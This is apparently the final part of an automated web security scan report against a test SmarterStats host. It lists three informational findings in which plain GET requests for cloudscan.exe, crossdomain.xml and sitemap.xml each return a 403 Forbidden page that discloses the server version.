11.12. http://vulnerable.smarterstats.6.0.host:9999/cloudscan.exe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /cloudscan.exe

Request

GET /cloudscan.exe HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:12:46 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.13. http://vulnerable.smarterstats.6.0.host:9999/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /crossdomain.xml

Request

GET /crossdomain.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:12:50 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.14. http://vulnerable.smarterstats.6.0.host:9999/sitemap.xml  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /sitemap.xml

Request

GET /sitemap.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:13:12 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

Report generated by XSS.CX Research Blog at Tue Oct 12 15:20:59 CDT 2010.